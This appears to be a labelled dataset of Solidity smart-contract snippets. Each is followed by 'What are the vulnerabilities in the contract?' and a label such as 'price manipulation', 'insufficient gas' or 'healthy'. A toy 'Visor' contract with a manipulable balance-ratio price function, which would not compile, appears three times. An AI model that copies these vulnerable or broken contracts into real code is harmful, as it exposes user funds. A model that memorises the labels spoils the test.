158             uint256 forVotes,
159             uint256 againstVotes,
160             uint256 abstainVotes,
161             bool canceled,
162             bool executed
163         )
164     {
165         id = proposalId;
166         eta = proposalEta(proposalId);
167         startBlock = proposalSnapshot(proposalId);
168         endBlock = proposalDeadline(proposalId);

169         ProposalDetails storage details = _proposalDetails[proposalId];
170         proposer = details.proposer;
171         forVotes = details.forVotes;
172         againstVotes = details.againstVotes;
173         abstainVotes = details.abstainVotes;

174         ProposalState status = state(proposalId);
175         canceled = status == ProposalState.Canceled;
176         executed = status == ProposalState.Executed;
177     }

178     /**
179      * @dev See {IGovernorCompatibilityBravo-getActions}.
180      */
181     function getActions(uint256 proposalId)
182         public
183         view
184         virtual
185         override
186         returns (
187             address[] memory targets,
188             uint256[] memory values,
189             string[] memory signatures,
190             bytes[] memory calldatas
191         )
192     {
193         ProposalDetails storage details = _proposalDetails[proposalId];
194         return (details.targets, details.values, details.signatures, details.calldatas);
195     }

196     /**
197      * @dev See {IGovernorCompatibilityBravo-getReceipt}.
198      */
199     function getReceipt(uint256 proposalId, address voter) public view virtual override returns (Receipt memory) {
200         return _proposalDetails[proposalId].receipts[voter];
201     }

202     /**
203      * @dev See {IGovernorCompatibilityBravo-quorumVotes}.
204      */
205     function quorumVotes() public view virtual override returns (uint256) {
206         return quorum(block.number - 1);
207     }

208     // ==================================================== Voting ====================================================
209     /**
210      * @dev See {IGovernor-hasVoted}.
211      */
212     function hasVoted(uint256 proposalId, address account) public view virtual override returns (bool) {
213         return _proposalDetails[proposalId].receipts[account].hasVoted;
214     }

215     /**
216      * @dev See {Governor-_quorumReached}. In this module, only forVotes count toward the quorum.
217      */
218     function _quorumReached(uint256 proposalId) internal view virtual override returns (bool) {
219         ProposalDetails storage details = _proposalDetails[proposalId];
220         return quorum(proposalSnapshot(proposalId)) <= details.forVotes;
221     }

222     /**
223      * @dev See {Governor-_voteSucceeded}. In this module, the forVotes must be strictly over the againstVotes.
224      */
225     function _voteSucceeded(uint256 proposalId) internal view virtual override returns (bool) {
226         ProposalDetails storage details = _proposalDetails[proposalId];
227         return details.forVotes > details.againstVotes;
228     }

229     /**
230      * @dev See {Governor-_countVote}. In this module, the support follows Governor Bravo.
231      */
232     function _countVote(
233         uint256 proposalId,
234         address account,
235         uint8 support,
236         uint256 weight,
237         bytes memory // params
238     ) internal virtual override {
239         ProposalDetails storage details = _proposalDetails[proposalId];
240         Receipt storage receipt = details.receipts[account];

241         require(!receipt.hasVoted, "GovernorCompatibilityBravo: vote already cast");
242         receipt.hasVoted = true;
243         receipt.support = support;
244         receipt.votes = SafeCast.toUint96(weight);

245         if (support == uint8(VoteType.Against)) {
246             details.againstVotes += weight;
247         } else if (support == uint8(VoteType.For)) {
248             details.forVotes += weight;
249         } else if (support == uint8(VoteType.Abstain)) {
250             details.abstainVotes += weight;
251         } else {
252             revert("GovernorCompatibilityBravo: invalid vote type");
253         }
254     }
255 }
What are the vulnerabilities in the contract?
insufficient gas
<end of text>
1 // SPDX-License-Identifier: MIT
2 // OpenZeppelin Contracts (last updated v4.8.0) (governance/compatibility/GovernorCompatibilityBravo.sol)

3 pragma solidity ^0.8.0;

4 import "../../utils/math/SafeCast.sol";
5 import "../extensions/IGovernorTimelock.sol";
6 import "../Governor.sol";
7 import "./IGovernorCompatibilityBravo.sol";
//use a lot fo arrays, need to check for their potential OOB errors

8 abstract contract GovernorCompatibilityBravo is IGovernorTimelock, IGovernorCompatibilityBravo, Governor {
9     enum VoteType {
10         Against,
11         For,
12         Abstain
13     }

14     struct ProposalDetails {
15         address proposer;
16         address[] targets;
17         uint256[] values;
18         string[] signatures; //important variable to keep track of
19         bytes[] calldatas;
20         uint256 forVotes;
21         uint256 againstVotes;
22         uint256 abstainVotes;
23         mapping(address => Receipt) receipts;
24         bytes32 descriptionHash;
25     }

26     mapping(uint256 => ProposalDetails) private _proposalDetails;

   
27     function COUNTING_MODE() public pure virtual override returns (string memory) {
28         return "support=bravo&quorum=bravo";
29     }


 
30     function propose(
31         address[] memory targets,
32         uint256[] memory values,
33         string[] memory signatures,
34         bytes[] memory calldatas,
35         string memory description
36     ) public virtual override returns (uint256) {
         //should we check here? 
37         _storeProposal(_msgSender(), targets, values, signatures, calldatas, description);
38         return propose(targets, values, _encodeCalldata(signatures, calldatas), description);
39     }

40    }
What are the vulnerabilities in the contract?
insufficient gas
<end of text>
1 // SPDX-License-Identifier: MIT
2 // OpenZeppelin Contracts (last updated v4.8.0-rc.2) (token/ERC721/ERC721.sol)

3 pragma solidity ^0.8.0;

4 import "./IERC721.sol";
5 import "./IERC721Receiver.sol";
6 import "./extensions/IERC721Metadata.sol";
7 import "../../utils/Address.sol";
8 import "../../utils/Context.sol";
9 import "../../utils/Strings.sol";
10 import "../../utils/introspection/ERC165.sol";

11 /**
12  * @dev Implementation of https://eips.ethereum.org/EIPS/eip-721[ERC721] Non-Fungible Token Standard, including
13  * the Metadata extension, but not including the Enumerable extension, which is available separately as
14  * {ERC721Enumerable}.
15  */
16 contract ERC721 is Context, ERC165, IERC721, IERC721Metadata {
17     using Address for address;
18     using Strings for uint256;

19     // Token name
20     string private _name;

21     // Token symbol
22     string private _symbol;

23     // Mapping from token ID to owner address
24     mapping(uint256 => address) private _owners;

25     // Mapping owner address to token count
26     mapping(address => uint256) private _balances;

27     // Mapping from token ID to approved address
28     mapping(uint256 => address) private _tokenApprovals;

29     // Mapping from owner to operator approvals
30     mapping(address => mapping(address => bool)) private _operatorApprovals;


31     constructor(string memory name_, string memory symbol_) {
32         _name = name_;
33         _symbol = symbol_;
34     }


35     function supportsInterface(bytes4 interfaceId) public view virtual override(ERC165, IERC165) returns (bool) {
36         return
37             interfaceId == type(IERC721).interfaceId ||
38             interfaceId == type(IERC721Metadata).interfaceId ||
39             super.supportsInterface(interfaceId);
40     }


41     function balanceOf(address owner) public view virtual override returns (uint256) {
42         require(owner != address(0), "ERC721: address zero is not a valid owner");
43         return _balances[owner];
44     }


45     function ownerOf(uint256 tokenId) public view virtual override returns (address) {
46         address owner = _ownerOf(tokenId);
47         require(owner != address(0), "ERC721: invalid token ID");
48         return owner;
49     }


50     function name() public view virtual override returns (string memory) {
51         return _name;
52     }


53     function symbol() public view virtual override returns (string memory) {
54         return _symbol;
55     }


56     function tokenURI(uint256 tokenId) public view virtual override returns (string memory) {
57         _requireMinted(tokenId);

58         string memory baseURI = _baseURI();
59         return bytes(baseURI).length > 0 ? string(abi.encodePacked(baseURI, tokenId.toString())) : "";
60     }


61     function _baseURI() internal view virtual returns (string memory) {
62         return "";
63     }


64     function approve(address to, uint256 tokenId) public virtual override {
65         address owner = ERC721.ownerOf(tokenId);
66         require(to != owner, "ERC721: approval to current owner");

67         require(_msgSender() == owner || isApprovedForAll(owner, _msgSender()), "ERC721: approve caller is not token owner or approved for all");

68         _approve(to, tokenId);
69     }


70     function getApproved(uint256 tokenId) public view virtual override returns (address) {
71         _requireMinted(tokenId);

72         return _tokenApprovals[tokenId];
73     }


74     function setApprovalForAll(address operator, bool approved) public virtual override {
75         _setApprovalForAll(_msgSender(), operator, approved);
76     }


77     function isApprovedForAll(address owner, address operator) public view virtual override returns (bool) {
78         return _operatorApprovals[owner][operator];
79     }


80     function transferFrom(
81         address from,
82         address to,
83         uint256 tokenId
84     ) public virtual override {
85         //solhint-disable-next-line max-line-length
86         require(_isApprovedOrOwner(_msgSender(), tokenId), "ERC721: caller is not token owner or approved");
             //watch out for flashloan attacks. Should we check here? 
87         _transfer(from, to, tokenId);
88     }


89     function safeTransferFrom(
90         address from,
91         address to,
92         uint256 tokenId
93     ) public virtual override {
94         safeTransferFrom(from, to, tokenId, "");
95     }

96     function safeTransferFrom(
97         address from,
98         address to,
99         uint256 tokenId,
100         bytes memory data
101     ) public virtual override {
102         require(_isApprovedOrOwner(_msgSender(), tokenId), "ERC721: caller is not token owner or approved");
103         _safeTransfer(from, to, tokenId, data);
104     }

 
105     function _safeTransfer(
106         address from,
107         address to,
108         uint256 tokenId,
109         bytes memory data
110     ) internal virtual {
111         _transfer(from, to, tokenId);
112         require(_checkOnERC721Received(from, to, tokenId, data), "ERC721: transfer to non ERC721Receiver implementer");
113     }

  
114     function _ownerOf(uint256 tokenId) internal view virtual returns (address) {
115         return _owners[tokenId];
116     }


117     function _exists(uint256 tokenId) internal view virtual returns (bool) {
118         return _ownerOf(tokenId) != address(0);
119     }


120     function _isApprovedOrOwner(address spender, uint256 tokenId) internal view virtual returns (bool) {
121         address owner = ERC721.ownerOf(tokenId);
122         return (spender == owner || isApprovedForAll(owner, spender) || getApproved(tokenId) == spender);
123     }


124     function _safeMint(address to, uint256 tokenId) internal virtual {
125         _safeMint(to, tokenId, "");
126     }


127     function _safeMint(
128         address to,
129         uint256 tokenId,
130         bytes memory data
131     ) internal virtual {
132         _mint(to, tokenId);
133         require(
134             _checkOnERC721Received(address(0), to, tokenId, data),
135             "ERC721: transfer to non ERC721Receiver implementer"
136         );
137     }


138     function _mint(address to, uint256 tokenId) internal virtual {
139         require(to != address(0), "ERC721: mint to the zero address");
140         require(!_exists(tokenId), "ERC721: token already minted");

141         _beforeTokenTransfer(address(0), to, tokenId, 1);

142         // Check that tokenId was not minted by `_beforeTokenTransfer` hook
143         require(!_exists(tokenId), "ERC721: token already minted");

144         unchecked {
145             // Will not overflow unless all 2**256 token ids are minted to the same owner.
146             // Given that tokens are minted one by one, it is impossible in practice that
147             // this ever happens. Might change if we allow batch minting.
148             // The ERC fails to describe this case.
149             _balances[to] += 1;
150         }

151         _owners[tokenId] = to;

152         emit Transfer(address(0), to, tokenId);

153         _afterTokenTransfer(address(0), to, tokenId, 1);
154     }


155     function _burn(uint256 tokenId) internal virtual {
156         address owner = ERC721.ownerOf(tokenId);

157         _beforeTokenTransfer(owner, address(0), tokenId, 1);

158         // Update ownership in case tokenId was transferred by `_beforeTokenTransfer` hook
159         owner = ERC721.ownerOf(tokenId);

160         // Clear approvals
161         delete _tokenApprovals[tokenId];

162         unchecked {
163             // Cannot overflow, as that would require more tokens to be burned/transferred
164             // out than the owner initially received through minting and transferring in.
165             _balances[owner] -= 1;
166         }
167         delete _owners[tokenId];

168         emit Transfer(owner, address(0), tokenId);

169         _afterTokenTransfer(owner, address(0), tokenId, 1);
170     }

  
171     function _transfer(
172         address from,
173         address to,
174         uint256 tokenId
175     ) internal virtual {
176         require(ERC721.ownerOf(tokenId) == from, "ERC721: transfer from incorrect owner");
177         require(to != address(0), "ERC721: transfer to the zero address");

178         _beforeTokenTransfer(from, to, tokenId, 1);

179         // Check that tokenId was not transferred by `_beforeTokenTransfer` hook
180         require(ERC721.ownerOf(tokenId) == from, "ERC721: transfer from incorrect owner");

181         // Clear approvals from the previous owner
182         delete _tokenApprovals[tokenId];

183         unchecked {
184             // `_balances[from]` cannot overflow for the same reason as described in `_burn`:
185             // `from`'s balance is the number of token held, which is at least one before the current
186             // transfer.
187             // `_balances[to]` could overflow in the conditions described in `_mint`. That would require
188             // all 2**256 token ids to be minted, which in practice is impossible.
189             _balances[from] -= 1;
190             _balances[to] += 1;
191         }
192         _owners[tokenId] = to;

193         emit Transfer(from, to, tokenId);

194         _afterTokenTransfer(from, to, tokenId, 1);
195     }


196     function _approve(address to, uint256 tokenId) internal virtual {
197         _tokenApprovals[tokenId] = to;
198         emit Approval(ERC721.ownerOf(tokenId), to, tokenId);
199     }


200     function _setApprovalForAll(
201         address owner,
202         address operator,
203         bool approved
204     ) internal virtual {
205         require(owner != operator, "ERC721: approve to caller");
206         _operatorApprovals[owner][operator] = approved;
207         emit ApprovalForAll(owner, operator, approved);
208     }

209     function _requireMinted(uint256 tokenId) internal view virtual {
210         require(_exists(tokenId), "ERC721: invalid token ID");
211     }



212     function _checkOnERC721Received(
213         address from,
214         address to,
215         uint256 tokenId,
216         bytes memory data
217     ) private returns (bool) {
218         if (to.isContract()) {
219             try IERC721Receiver(to).onERC721Received(_msgSender(), from, tokenId, data) returns (bytes4 retval) {
220                 return retval == IERC721Receiver.onERC721Received.selector;
221             } catch (bytes memory reason) {
222                 if (reason.length == 0) {
223                     revert("ERC721: transfer to non ERC721Receiver implementer");
224                 } else {
225                     /// @solidity memory-safe-assembly
226                     assembly {
227                         revert(add(32, reason), mload(reason))
228                     }
229                 }
230             }
231         } else {
232             return true;
233         }
234     }


235     function _beforeTokenTransfer(
236         address from,
237         address to,
238         uint256, /* firstTokenId */
239         uint256 batchSize
240     ) internal virtual {
241         if (batchSize > 1) {
242             if (from != address(0)) {
243                 _balances[from] -= batchSize;
244             }
245             if (to != address(0)) {
246                 _balances[to] += batchSize;
247             }
248         }
249     }

  
250     function _afterTokenTransfer(
251         address from,
252         address to,
253         uint256 firstTokenId,
254         uint256 batchSize
255     ) internal virtual {}
256 }
What are the vulnerabilities in the contract?
healthy 
<end of text>
1 pragma solidity ^0.5.0;

2 import "./Libraries/IERC20.sol";
3 import "./SafeMath.sol";
//watch out for flashloan

4 contract Visor is IERC20{
5   IERC20 myToken;
6   IERC20 token0;
7   IERC20 token1; 
8   address to; 
9   uint tokenPrice; //track price change 

10   function liquidate(uint ceilPrice) public {        
11     tokenPrice = getPrice(); 
         //price is going to change: should we check here? 
12     if (tokenPrice >= ceilPrice){
13       myToken.transfer(to, 100);
14     }    
15   }

16   function getPrice() public{
17     price = token0.balanceOf(address(this))/token1.balanceOf(address(this));
         
18   }  
19 }
What are the vulnerabilities in the contract?
price manipulation
<end of text>
1 pragma solidity ^0.5.0;

2 import "./Libraries/IERC20.sol";
3 import "./SafeMath.sol";
//watch out for flashloan

4 contract Visor is IERC20{
5   IERC20 myToken;
6   IERC20 token0;
7   IERC20 token1; 
8   address to; 
9   uint tokenPrice; //track price change 

10   function liquidate(uint ceilPrice) public {        
11     tokenPrice = getPrice(); 
         //price is going to change: should we check here? 
12     if (tokenPrice >= ceilPrice){
13       myToken.transfer(to, 100);
14     }    
15   }

16   function getPrice() public{
17     price = token0.balanceOf(address(this))/token1.balanceOf(address(this));
         
18   }  
19 }
What are the vulnerabilities in the contract?
price manipulation
<end of text>
1 pragma solidity ^0.5.0;

2 import "./Libraries/IERC20.sol";
3 import "./SafeMath.sol";
//watch out for flashloan

4 contract Visor is IERC20{
5   IERC20 myToken;
6   IERC20 token0;
7   IERC20 token1; 
8   address to; 
9   uint tokenPrice; //track price change 

10   function liquidate(uint ceilPrice) public {        
11     tokenPrice = getPrice(); 
         //price is going to change: should we check here? 
12     if (tokenPrice >= ceilPrice){
13       myToken.transfer(to, 100);
14     }    
15   }

16   function getPrice() public{
17     price = token0.balanceOf(address(this))/token1.balanceOf(address(this));
         
18   }  
19 }
What are the vulnerabilities in the contract?
price manipulation
<end of text>
1 pragma solidity >=0.8.0;
2 
3 interface ISushiswapV2Pair {
4     function factory() external view returns (address);
5     function token0() external view returns (address);
6     function token1() external view returns (address);
7     function getReserves() external view returns (uint112 reserve0, uint112 reserve1, uint32 blockTimestampLast);
8     function swap(uint amount0Out, uint amount1Out, address to, bytes calldata data) external;
9 }
10 
11 // a library for performing overflow-safe math, courtesy of DappHub (https://github.com/dapphub/ds-math)
12 
13 library SafeMathSushiswap {
14     function add(uint x, uint y) internal pure returns (uint z) {
15         require((z = x + y) >= x, 'ds-math-add-overflow');
16     }
17 
18     function sub(uint x, uint y) internal pure returns (uint z) {
19         require((z = x - y) <= x, 'ds-math-sub-underflow');
20     }
21 
22     function mul(uint x, uint y) internal pure returns (uint z) {
23         require(y == 0 || (z = x * y) / y == x, 'ds-math-mul-overflow');
24     }
25 }
26 
27 library SushiswapV2Library {
28     using SafeMathSushiswap for uint;
29 
30     // returns sorted token addresses, used to handle return values from pairs sorted in this order
31     function sortTokens(address tokenA, address tokenB) internal pure returns (address token0, address token1) {
32         require(tokenA != tokenB, 'SushiswapV2Library: IDENTICAL_ADDRESSES');
33         (token0, token1) = tokenA < tokenB ? (tokenA, tokenB) : (tokenB, tokenA);
34         require(token0 != address(0), 'SushiswapV2Library: ZERO_ADDRESS');
35     }
36 
37     // calculates the CREATE2 address for a pair without making any external calls
38     function pairFor(address factory, address tokenA, address tokenB) internal pure returns (address pair) {
39         (address token0, address token1) = sortTokens(tokenA, tokenB);
40         pair = address(uint160(uint256(keccak256(abi.encodePacked(
41                 hex'ff',
42                 factory,
43                 keccak256(abi.encodePacked(token0, token1)),
44                 hex'e18a34eb0e04b04f7a0ac29a6e80748dca96319b42c54d679cb821dca90c6303' // init code hash
45             )))));
46     }
47 
48     // fetches and sorts the reserves for a pair
49     function getReserves(address factory, address tokenA, address tokenB) internal view returns (uint reserveA, uint reserveB) {
50         (address token0,) = sortTokens(tokenA, tokenB);
51         (uint reserve0, uint reserve1,) = ISushiswapV2Pair(pairFor(factory, tokenA, tokenB)).getReserves();
52         (reserveA, reserveB) = tokenA == token0 ? (reserve0, reserve1) : (reserve1, reserve0);
53     }
54 
55     // given some amount of an asset and pair reserves, returns an equivalent amount of the other asset
56     function quote(uint amountA, uint reserveA, uint reserveB) internal pure returns (uint amountB) {
57         require(amountA > 0, 'SushiswapV2Library: INSUFFICIENT_AMOUNT');
58         require(reserveA > 0 && reserveB > 0, 'SushiswapV2Library: INSUFFICIENT_LIQUIDITY');
59         amountB = amountA.mul(reserveB) / reserveA;
60     }
61 
62     // given an input amount of an asset and pair reserves, returns the maximum output amount of the other asset
63     function getAmountOut(uint amountIn, uint reserveIn, uint reserveOut) internal pure returns (uint amountOut) {
64         require(amountIn > 0, 'SushiswapV2Library: INSUFFICIENT_INPUT_AMOUNT');
65         require(reserveIn > 0 && reserveOut > 0, 'SushiswapV2Library: INSUFFICIENT_LIQUIDITY');
66         uint amountInWithFee = amountIn.mul(997);
67         uint numerator = amountInWithFee.mul(reserveOut);
68         uint denominator = reserveIn.mul(1000).add(amountInWithFee);
69         amountOut = numerator / denominator;
70     }
71 
72     // given an output amount of an asset and pair reserves, returns a required input amount of the other asset
73     function getAmountIn(uint amountOut, uint reserveIn, uint reserveOut) internal pure returns (uint amountIn) {
74         require(amountOut > 0, 'SushiswapV2Library: INSUFFICIENT_OUTPUT_AMOUNT');
75         require(reserveIn > 0 && reserveOut > 0, 'SushiswapV2Library: INSUFFICIENT_LIQUIDITY');
76         uint numerator = reserveIn.mul(amountOut).mul(1000);
77         uint denominator = reserveOut.sub(amountOut).mul(997);
78         amountIn = (numerator / denominator).add(1);
79     }
80 
81     // performs chained getAmountOut calculations on any number of pairs
82     function getAmountsOut(address factory, uint amountIn, address[] memory path) internal view returns (uint[] memory amounts) {
83         require(path.length >= 2, 'SushiswapV2Library: INVALID_PATH');
84         amounts = new uint[](path.length);
85         amounts[0] = amountIn;
86         for (uint i; i < path.length - 1; i++) {
87             (uint reserveIn, uint reserveOut) = getReserves(factory, path[i], path[i + 1]);
88             amounts[i + 1] = getAmountOut(amounts[i], reserveIn, reserveOut);
89         }
90     }
91 
92     // performs chained getAmountIn calculations on any number of pairs
93     function getAmountsIn(address factory, uint amountOut, address[] memory path) internal view returns (uint[] memory amounts) {
94         require(path.length >= 2, 'SushiswapV2Library: INVALID_PATH');
95         amounts = new uint[](path.length);
96         amounts[amounts.length - 1] = amountOut;
97         for (uint i = path.length - 1; i > 0; i--) {
98             (uint reserveIn, uint reserveOut) = getReserves(factory, path[i - 1], path[i]);
99             amounts[i - 1] = getAmountIn(amounts[i], reserveIn, reserveOut);
100         }
101     }
102 }
103 
104 // helper methods for interacting with ERC20 tokens and sending NATIVE that do not consistently return true/false
105 library TransferHelper {
106     function safeApprove(address token, address to, uint value) internal {
107         // bytes4(keccak256(bytes('approve(address,uint256)')));
108         (bool success, bytes memory data) = token.call(abi.encodeWithSelector(0x095ea7b3, to, value));
109         require(success && (data.length == 0 || abi.decode(data, (bool))), 'TransferHelper: APPROVE_FAILED');
110     }
111 
112     function safeTransfer(address token, address to, uint value) internal {
113         // bytes4(keccak256(bytes('transfer(address,uint256)')));
114         (bool success, bytes memory data) = token.call(abi.encodeWithSelector(0xa9059cbb, to, value));
115         require(success && (data.length == 0 || abi.decode(data, (bool))), 'TransferHelper: TRANSFER_FAILED');
116     }
117 
118     function safeTransferFrom(address token, address from, address to, uint value) internal {
119         // bytes4(keccak256(bytes('transferFrom(address,address,uint256)')));
120         (bool success, bytes memory data) = token.call(abi.encodeWithSelector(0x23b872dd, from, to, value));
121         require(success && (data.length == 0 || abi.decode(data, (bool))), 'TransferHelper: TRANSFER_FROM_FAILED');
122     }
123 
124     function safeTransferNative(address to, uint value) internal {
125         (bool success,) = to.call{value:value}(new bytes(0));
126         require(success, 'TransferHelper: NATIVE_TRANSFER_FAILED');
127     }
128 }
129 
130 interface IwNATIVE {
131     function deposit() external payable;
132     function transfer(address to, uint value) external returns (bool);
133     function withdraw(uint) external;
134 }
135 
136 interface AnyswapV1ERC20 {
137     function mint(address to, uint256 amount) external returns (bool);
138     function burn(address from, uint256 amount) external returns (bool);
139     function changeVault(address newVault) external returns (bool);
140     function depositVault(uint amount, address to) external returns (uint);
141     function withdrawVault(address from, uint amount, address to) external returns (uint);
142     function underlying() external view returns (address);
143 }
144 
145 /**
146  * @dev Interface of the ERC20 standard as defined in the EIP.
147  */
148 interface IERC20 {
149     function totalSupply() external view returns (uint256);
150     function balanceOf(address account) external view returns (uint256);
151     function transfer(address recipient, uint256 amount) external returns (bool);
152     function allowance(address owner, address spender) external view returns (uint256);
153     function approve(address spender, uint256 amount) external returns (bool);
154     function permit(address target, address spender, uint256 value, uint256 deadline, uint8 v, bytes32 r, bytes32 s) external;
155     function transferFrom(address sender, address recipient, uint256 amount) external returns (bool);
156     function transferWithPermit(address target, address to, uint256 value, uint256 deadline, uint8 v, bytes32 r, bytes32 s) external returns (bool);
157 
158     event Transfer(address indexed from, address indexed to, uint256 value);
159     event Approval(address indexed owner, address indexed spender, uint256 value);
160 }
161 
162 contract AnyswapV4Router {
163     using SafeMathSushiswap for uint;
164 
165     address public immutable factory;
166     address public immutable wNATIVE;
167 
168     modifier ensure(uint deadline) {
169         require(deadline >= block.timestamp, 'AnyswapV3Router: EXPIRED');
170         _;
171     }
172 
173     constructor(address _factory, address _wNATIVE, address _mpc) {
174         _newMPC = _mpc;
175         _newMPCEffectiveTime = block.timestamp;
176         factory = _factory;
177         wNATIVE = _wNATIVE;
178     }
179 
180     receive() external payable {
181         assert(msg.sender == wNATIVE); // only accept Native via fallback from the wNative contract
182     }
183 
184     address private _oldMPC;
185     address private _newMPC;
186     uint256 private _newMPCEffectiveTime;
187 
188 
189     event LogChangeMPC(address indexed oldMPC, address indexed newMPC, uint indexed effectiveTime, uint chainID);
190     event LogChangeRouter(address indexed oldRouter, address indexed newRouter, uint chainID);
191     event LogAnySwapIn(bytes32 indexed txhash, address indexed token, address indexed to, uint amount, uint fromChainID, uint toChainID);
192     event LogAnySwapOut(address indexed token, address indexed from, address indexed to, uint amount, uint fromChainID, uint toChainID);
193     event LogAnySwapTradeTokensForTokens(address[] path, address indexed from, address indexed to, uint amountIn, uint amountOutMin, uint fromChainID, uint toChainID);
194     event LogAnySwapTradeTokensForNative(address[] path, address indexed from, address indexed to, uint amountIn, uint amountOutMin, uint fromChainID, uint toChainID);
195 
196     modifier onlyMPC() {
197         require(msg.sender == mpc(), "AnyswapV3Router: FORBIDDEN");
198         _;
199     }
200 
201     function mpc() public view returns (address) {
202         if (block.timestamp >= _newMPCEffectiveTime) {
203             return _newMPC;
204         }
205         return _oldMPC;
206     }
207 
208     function cID() public view returns (uint id) {
209         assembly {id := chainid()}
210     }
211 
212     function changeMPC(address newMPC) public onlyMPC returns (bool) {
213         require(newMPC != address(0), "AnyswapV3Router: address(0x0)");
214         _oldMPC = mpc();
215         _newMPC = newMPC;
216         _newMPCEffectiveTime = block.timestamp + 2*24*3600;
217         emit LogChangeMPC(_oldMPC, _newMPC, _newMPCEffectiveTime, cID());
218         return true;
219     }
220 
221     function changeVault(address token, address newVault) public onlyMPC returns (bool) {
222         require(newVault != address(0), "AnyswapV3Router: address(0x0)");
223         return AnyswapV1ERC20(token).changeVault(newVault);
224     }
225 
226     function _anySwapOut(address from, address token, address to, uint amount, uint toChainID) internal {
227         AnyswapV1ERC20(token).burn(from, amount);
228         emit LogAnySwapOut(token, from, to, amount, cID(), toChainID);
229     }
230 
231     // Swaps `amount` `token` from this chain to `toChainID` chain with recipient `to`
232     function anySwapOut(address token, address to, uint amount, uint toChainID) external {
233         _anySwapOut(msg.sender, token, to, amount, toChainID);
234     }
235 
236     // Swaps `amount` `token` from this chain to `toChainID` chain with recipient `to` by minting with `underlying`
237     function anySwapOutUnderlying(address token, address to, uint amount, uint toChainID) external {
238         TransferHelper.safeTransferFrom(AnyswapV1ERC20(token).underlying(), msg.sender, token, amount);
239         AnyswapV1ERC20(token).depositVault(amount, msg.sender);
240         _anySwapOut(msg.sender, token, to, amount, toChainID);
241     }
242 
243     function anySwapOutUnderlyingWithPermit(
244         address from,
245         address token,
246         address to,
247         uint amount,
248         uint deadline,
249         uint8 v,
250         bytes32 r,
251         bytes32 s,
252         uint toChainID
253     ) external {
254         address _underlying = AnyswapV1ERC20(token).underlying();
255         IERC20(_underlying).permit(from, address(this), amount, deadline, v, r, s);
256         TransferHelper.safeTransferFrom(_underlying, from, token, amount);
257         AnyswapV1ERC20(token).depositVault(amount, from);
258         _anySwapOut(from, token, to, amount, toChainID);
259     }
260 
261     function anySwapOutUnderlyingWithTransferPermit(
262         address from,
263         address token,
264         address to,
265         uint amount,
266         uint deadline,
267         uint8 v,
268         bytes32 r,
269         bytes32 s,
270         uint toChainID
271     ) external {
272         IERC20(AnyswapV1ERC20(token).underlying()).transferWithPermit(from, token, amount, deadline, v, r, s);
273         AnyswapV1ERC20(token).depositVault(amount, from);
274         _anySwapOut(from, token, to, amount, toChainID);
275     }
276 
277     function anySwapOut(address[] calldata tokens, address[] calldata to, uint[] calldata amounts, uint[] calldata toChainIDs) external {
278         for (uint i = 0; i < tokens.length; i++) {
279             _anySwapOut(msg.sender, tokens[i], to[i], amounts[i], toChainIDs[i]);
280         }
281     }
282 
283     // swaps `amount` `token` in `fromChainID` to `to` on this chainID
284     function _anySwapIn(bytes32 txs, address token, address to, uint amount, uint fromChainID) internal {
285         AnyswapV1ERC20(token).mint(to, amount);
286         emit LogAnySwapIn(txs, token, to, amount, fromChainID, cID());
287     }
288 
289     // swaps `amount` `token` in `fromChainID` to `to` on this chainID
290     // triggered by `anySwapOut`
291     function anySwapIn(bytes32 txs, address token, address to, uint amount, uint fromChainID) external onlyMPC {
292         _anySwapIn(txs, token, to, amount, fromChainID);
293     }
294 
295     // swaps `amount` `token` in `fromChainID` to `to` on this chainID with `to` receiving `underlying`
296     function anySwapInUnderlying(bytes32 txs, address token, address to, uint amount, uint fromChainID) external onlyMPC {
297         _anySwapIn(txs, token, to, amount, fromChainID);
298         AnyswapV1ERC20(token).withdrawVault(to, amount, to);
299     }
300 
301     // swaps `amount` `token` in `fromChainID` to `to` on this chainID with `to` receiving `underlying` if possible
302     function anySwapInAuto(bytes32 txs, address token, address to, uint amount, uint fromChainID) external onlyMPC {
303         _anySwapIn(txs, token, to, amount, fromChainID);
304         AnyswapV1ERC20 _anyToken = AnyswapV1ERC20(token);
305         address _underlying = _anyToken.underlying();
306         if (_underlying != address(0) && IERC20(_underlying).balanceOf(token) >= amount) {
307             _anyToken.withdrawVault(to, amount, to);
308         }
309     }
310 
311     // extracts mpc fee from bridge fees
312     function anySwapFeeTo(address token, uint amount) external onlyMPC {
313         address _mpc = mpc();
314         AnyswapV1ERC20(token).mint(_mpc, amount);
315         AnyswapV1ERC20(token).withdrawVault(_mpc, amount, _mpc);
316     }
317 
318     function anySwapIn(bytes32[] calldata txs, address[] calldata tokens, address[] calldata to, uint256[] calldata amounts, uint[] calldata fromChainIDs) external onlyMPC {
319         for (uint i = 0; i < tokens.length; i++) {
320             _anySwapIn(txs[i], tokens[i], to[i], amounts[i], fromChainIDs[i]);
321         }
322     }
323 
324     // **** SWAP ****
325     // requires the initial amount to have already been sent to the first pair
326     function _swap(uint[] memory amounts, address[] memory path, address _to) internal virtual {
327         for (uint i; i < path.length - 1; i++) {
328             (address input, address output) = (path[i], path[i + 1]);
329             (address token0,) = SushiswapV2Library.sortTokens(input, output);
330             uint amountOut = amounts[i + 1];
331             (uint amount0Out, uint amount1Out) = input == token0 ? (uint(0), amountOut) : (amountOut, uint(0));
332             address to = i < path.length - 2 ? SushiswapV2Library.pairFor(factory, output, path[i + 2]) : _to;
333             ISushiswapV2Pair(SushiswapV2Library.pairFor(factory, input, output)).swap(
334                 amount0Out, amount1Out, to, new bytes(0)
335             );
336         }
337     }
338 
339     // sets up a cross-chain trade from this chain to `toChainID` for `path` trades to `to`
340     function anySwapOutExactTokensForTokens(
341         uint amountIn,
342         uint amountOutMin,
343         address[] calldata path,
344         address to,
345         uint deadline,
346         uint toChainID
347     ) external virtual ensure(deadline) {
348         AnyswapV1ERC20(path[0]).burn(msg.sender, amountIn);
349         emit LogAnySwapTradeTokensForTokens(path, msg.sender, to, amountIn, amountOutMin, cID(), toChainID);
350     }
351 
352     // sets up a cross-chain trade from this chain to `toChainID` for `path` trades to `to`
353     function anySwapOutExactTokensForTokensUnderlying(
354         uint amountIn,
355         uint amountOutMin,
356         address[] calldata path,
357         address to,
358         uint deadline,
359         uint toChainID
360     ) external virtual ensure(deadline) {
361         TransferHelper.safeTransferFrom(AnyswapV1ERC20(path[0]).underlying(), msg.sender, path[0], amountIn);
362         AnyswapV1ERC20(path[0]).depositVault(amountIn, msg.sender);
363         AnyswapV1ERC20(path[0]).burn(msg.sender, amountIn);
364         emit LogAnySwapTradeTokensForTokens(path, msg.sender, to, amountIn, amountOutMin, cID(), toChainID);
365     }
366 
367     // sets up a cross-chain trade from this chain to `toChainID` for `path` trades to `to`
